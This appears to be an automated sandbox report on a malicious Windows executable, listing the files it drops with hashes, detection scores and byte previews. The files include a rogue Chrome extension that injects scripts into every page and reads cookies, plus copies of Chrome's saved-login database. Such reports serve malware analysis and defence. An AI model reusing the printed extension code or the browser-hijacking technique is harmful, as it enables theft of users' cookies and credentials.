                                                                                                                                                SSDEEP:24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
                                                                                                                                                MD5:5D207F5A21E55E47FCCD8EF947A023AE
                                                                                                                                                SHA1:3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
                                                                                                                                                SHA-256:4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
                                                                                                                                                SHA-512:38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: .PNG........IHDR.............;0.....PIDATH..]..e....y....uw.u.>...D../..3$...".......J....H...(......0J...D...X,0?.v&Ww...9]<...;.:.Mt.w.............L.V..|z.Z_..b$...)...z.....|.\.?3Uw....^.{..xz..G.....`.Z_"!........x..L.G..H..=...o3.....?F.f'!6.W.~+@.`D.....g+......r].*..... .ob.8.M.jg.....X....L..P....A.D..Uo2.....\......w.y..`&...W..".XAE..V...<t.Y.,.@.......rb..R$..8@..(.. ...i..H.%R)`.h..1..43.jr.......p..pd.G"..8$..,.M..RL^.....u.....84u.......)8 NTH.#.....o0....2.....$27...e>..2.h._N..s.D...D..$.\....l:..7G.....(H..2...7f..g.i...(......O...M.Po..`.3.x.;....eO.Lr..).......XH.:....*...k..O.$....z7..U.a.H.IW.w..uU....o... u.....F1.q.Vf..S. .L...KF..*Mu5..\3p.l.6.{.Z..y#...J...B."...U..T...F.qv....F...u.]........@.QZzA..L...<........J.L$...2*.................0.0&]..;.of,..j.P.&.Yq..b.1!M..l...B.X.xp...4.h.....W.M.6.sPQG.v6........R....-@......z.b.zL.i..?......b...u|.;>...I....$..M..^:...wLTK...l.....=m.c...v...wz....a..5..}m......l
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\icon48.png
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2235
                                                                                                                                                Entropy (8bit):7.880518016071819
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
                                                                                                                                                MD5:E35B805293CCD4F74377E9959C35427D
                                                                                                                                                SHA1:9755C6F8BAB51BD40BD6A51D73BE2570605635D1
                                                                                                                                                SHA-256:2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
                                                                                                                                                SHA-512:6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: .PNG........IHDR...0...0.....W.......IDATh..Z]l\G.......4."..8N..XB.....D#.< $. W..}....K...P.Q...........P..-xJT.O.*.!UBNjHl'..2..d.k......;........;s.3.o..........)B....D.D:.TH@...W...YB_...kw{&.{.[v;..ot.Zm..!j..PN.....i\. ...r..iU.O...f...........{...B* ..dh)...l.:|)`...'.......c.`.....,.Q.]f~BD@2s.{'V.d..{`IAFO...I......7..7.)j=...p.S..#..x.Ar@$.LQ......,@....\...M5.\.&e0.J...|....Z....h.]P.E.3T.]..4..$..)..J.._...c..g....L.....T.VR|y....Bd..y.k..x..m[q.7...I.S&..'..Rx~...R...y.n.7n.L.|..OZH.......YR.......9.....r....%H_`..n....Q.Q..a..wy} .EnL..r!W...M.%e.1`..i.El..N0_@..S....+.>=L....f...<....?_^[.....e2...@..d,w.....{.........s.......<.#...u<...tM]%K...}.c.......NLB.'.V)A.x.o..-..Y.0..o....L'zk$.$..Yvi..xP...........k..sB...z....\.L....k..l.47[8.?..../..0s..T..O....|E.@.Q."P.k.YNH;x....$.H<.....T...`........................'&.1...C...7.....z^.Xf..e}`...j.:.g.....>..Z{qcm..D.F.DyLK.@@..w,A.a.@.. ..sk.iZ"..d..+.M.....&N.y
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\jquery-1.8.3.min.js
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):93637
                                                                                                                                                Entropy (8bit):5.292996107428883
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
                                                                                                                                                MD5:E1288116312E4728F98923C79B034B67
                                                                                                                                                SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
                                                                                                                                                SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
                                                                                                                                                SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: /*! jQuery v1.8.3 jquery.com | jquery.org/license */..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\manifest.json
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2380
                                                                                                                                                Entropy (8bit):5.687293760500434
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
                                                                                                                                                MD5:ADF10776EEC8DC0F6E7E3B4AD59CF504
                                                                                                                                                SHA1:4F11FE569189036B42923EF5A8AFB0985DCECDF5
                                                                                                                                                SHA-256:ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
                                                                                                                                                SHA-512:7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: {.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http://*/*", "https://*/*" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\popup.html
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):280
                                                                                                                                                Entropy (8bit):5.048307538221611
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
                                                                                                                                                MD5:E93B02D6CFFCCA037F3EA55DC70EE969
                                                                                                                                                SHA1:DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
                                                                                                                                                SHA-256:B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
                                                                                                                                                SHA-512:F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: <!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\popup.js
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):642
                                                                                                                                                Entropy (8bit):4.985939227199713
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
                                                                                                                                                MD5:2AC02EE5F808BC4DEB832FB8E7F6F352
                                                                                                                                                SHA1:05375EF86FF516D91FB9746C0CBC46D2318BEB86
                                                                                                                                                SHA-256:DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
                                                                                                                                                SHA-512:6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: $(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5453
                                                                                                                                                Entropy (8bit):5.1778438140266125
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:nHXbTqqz/X7jgFO4IV+H/k0JCKL8rbobOEQVuwv:nHXbTJz/rMFoon4KsX
                                                                                                                                                MD5:CEA23A1FFBF8271C9A4543A57C4D9684
                                                                                                                                                SHA1:48D0514B8C6917B57BD092731B2C51679E31B005
                                                                                                                                                SHA-256:A1D30920EB823D01DD3BD0FEFD3004C3F70732ECBD73A7C8D443C76473B65E7E
                                                                                                                                                SHA-512:5692C7BB8667B1E6090169DE636E4673752D9312B8A9ED09D66A34A54954B12725F18047F37DFFFD850BF24B3EA56746C6D5E64D4250B9B2D1EDFA9575638FCE
                                                                                                                                                Malicious:true
                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13245952892183974","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245952963463509","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1501624"],"daily_received_length":["0","0","0","0","0","0","0",
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):34636
                                                                                                                                                Entropy (8bit):5.5394367000232565
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:AEpwDvUckPWfr+odLl0b1kXqKf/pUZNCgVLH2HfVrUkGRnJziWC:EDhLwjRnNiv
                                                                                                                                                MD5:0DB0D353C97F12B5A1D82ADCC9F25B9D
                                                                                                                                                SHA1:3D4D71E91E74D8120FE44C170A643FAADA389487
                                                                                                                                                SHA-256:0C1B24F1524174D45410539B2CA583C1637EFECD91AE0C52A4EBFD91B00B2A24
                                                                                                                                                SHA-512:3AB9D9842608401D55EDADB77B4C1EB754E2121D02F9E8561D4FEE2FE776C678CED51AC6702BA1499DD49FBF8861D438D128378F3E2490BEC37A95A66F415549
                                                                                                                                                Malicious:true
                                                                                                                                                Preview: {"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245952896894319","lastpingday":"13245947457776957","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m
                                                                                                                                                C:\Users\user\AppData\Local\Login Data1611970607033
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.792852251086831
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Login Data1611970645542
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.792852251086831
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\1611970606876
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:7-zip archive data, version 0.3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):37737
                                                                                                                                                Entropy (8bit):7.994967159065528
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
                                                                                                                                                MD5:5A6469A3F787ABD2AE93B47470528F79
                                                                                                                                                SHA1:4032B59237CC883FB752D9727971B435F4D27EB8
                                                                                                                                                SHA-256:1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
                                                                                                                                                SHA-512:335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: 7z..'...IVw '......."........S.......8%D...2 ..J...y1.C.......HE89.V.Z',n*.$.T.V.....O.%{.I.6!....."..:.L..nrH..A.m.......5.M.o......Q...r......|.k1..S"..w"Y...2pS....g.....V:y.;..+..P..8F.t...).&:.!j.....=...%.d.b.u.&..4y.<.97.[.`L]7...sZ.;.K..EA.lIO....N....D..\C.enT.f.....t.....]..w.....E...Ffc.$.Sw`].%.J.{........y.n2F.......v...#t.^.....Si&wb..A.@..#....bi_.....;..........!.~..........g.Q.@/.1\....*.f.q.=..t...).<|...?u.....JH.CD..i.s..4..c9.;X.._r7.9..{...wfg..:/.....?j.N.z....+...j)...K..v...4.9.......t.ZN...#.W.e...o...V..z...u...lNR..z.....fi.y.k......$...,N[.....F.U..~oJ.Cn.....+H..)....)!l...............8.....Z..(....L.~.....fsQ..W........p........q..T.....p.....uC..,;......1Pl...|.....G......-....=............L.......}O8y....H...g...E..c...k2c...&...4...]?A....FG....._.W.B?....p.X..gC........G...._Y.A..P..........k.../.7YO.c.M.i....|..^.+RP]...D.jq.z'..4.|I*......jq..w.%..2/|.....>..y...>......C.)8B7$Z...{P.~..&...b..........
                                                                                                                                                C:\Users\user\AppData\Local\Temp\1611970639276
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:7-zip archive data, version 0.3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):553040
                                                                                                                                                Entropy (8bit):7.999671101282436
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
                                                                                                                                                MD5:A4427F2F46DEEA15CEA87BDBB53A22CC
                                                                                                                                                SHA1:158501079514868D85246E970314A024FF263199
                                                                                                                                                SHA-256:18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
                                                                                                                                                SHA-512:334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: 7z..'.....7..p......$........1...(..`(...<.^..-.+....Q.3D-.........i..si.a.,V.k.{JU.dk.'.h... KR.$~W...&. ..........<Y9.,.0.k+.<b...?zqlnw......\..5C...^...y.... ..FZ..0.$.....vds.....Yx.Q...x.._..Yk..n.>&.Y..7.B=.(.8.w<...sVs.V..6<o.(......b..t..b..@...~.........\..Y:r!ix....$!...{.h..,.......J..M".....0N.^..@..X.8.`...=._].._f.Q..D...3.==0..)f...............s..:...Gd...(!L....A)*:..r...>.....@.4.."s..G......j.7...{\...[..=.+y7..0.'...................i..d...!..b...c.s.}..g..(!,.H@<sl.*Y..'*....dm..?B.c7S..{...f...c...P.S.#...w=.+.M.U@u.....^.XI.....!u}...?.SYUK....O...G.]+.^....'..`&.a....F.......c..o....c..Z4.......Q1..1L..J.p.>...j.!.il>..y8..S...@....7..Hc...y...UNJj..9...@.../.'#.....N...BC?..C....Ga[J.vb....mn..@..z.../Kc.,Y<.tA*.2...O......|....Drrl)..7..9.....pNj.P6|].t .'.|.yb..SO.......`....H..-..h.+x..4...v1. ...'.4)3.N..,2_.U..]...I4y.R.I.....b.......N!e%.4.0*"l,.H.2..'..^42....9..sX..1.....8z.u#A\.....tbP........&...U....9
                                                                                                                                                C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                Process:C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4247224
                                                                                                                                                Entropy (8bit):7.867812997543559
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:roT9J9uexVOSTjyxyFHYRSfSlDR4ZmCc+92ngXBZfiustXoca4P/8uXojZ0Oylih:roT9mexHpullCHlxATtZpJ+8yBVj
                                                                                                                                                MD5:63204EB716C856723A010747D58A6B00
                                                                                                                                                SHA1:7E97F00B4C3580CEDEE02C448AC9AEB54AFEFBD2
                                                                                                                                                SHA-256:6D2DB66A98EC5730BDCBC41DC7C78210FE24FE48BF7E44B59AB01C2084900456
                                                                                                                                                SHA-512:4B00DC3D824D3526972F74B913CFF2B1D0E12745DE58BFE4BA6196088A17B2346B4EC019BDF923ACC57C77F88AA7B17FA230100C6C35B6672C7A39BFA4953C2E
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 59%
                                                                                                                                                Preview: MZ......................@.............................................>....L.!This program cannot be run in DOS mode....$.......$<!,`]O.`]O.`]O.V{D.a]O..AA.u]O..B\.m]O.`]N..]O.V{E..]O..[I.a]O.Rich`]O.................PE..L.....%V.............................;............@..........................0.......i.............................................. ............... ...............................................................................................text...v........................... ....rdata........... ..................@..@.data....N.......@..................@....rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe:Zone.Identifier
                                                                                                                                                Process:C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):26
                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                Malicious:true
                                                                                                                                                Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                C:\Users\user\AppData\Local\Temp\MSIDCDD.tmp
                                                                                                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6656
                                                                                                                                                Entropy (8bit):5.2861874904617645
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
                                                                                                                                                MD5:84878B1A26F8544BDA4E069320AD8E7D
                                                                                                                                                SHA1:51C6EE244F5F2FA35B563BFFB91E37DA848A759C
                                                                                                                                                SHA-256:809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
                                                                                                                                                SHA-512:4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: N1yprTBBXs.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.._F..e..&m...e...e...e...i...e...i...e...i...e..Rich.e..........PE..L......D...........!......................... ...............................@.......................................$......H#..P............................0......p ............................................... ..l............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):268744
                                                                                                                                                Entropy (8bit):5.398284390686728
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
                                                                                                                                                MD5:E2E9483568DC53F68BE0B80C34FE27FB
                                                                                                                                                SHA1:8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
                                                                                                                                                SHA-256:205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
                                                                                                                                                SHA-512:B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 8%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: N1yprTBBXs.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
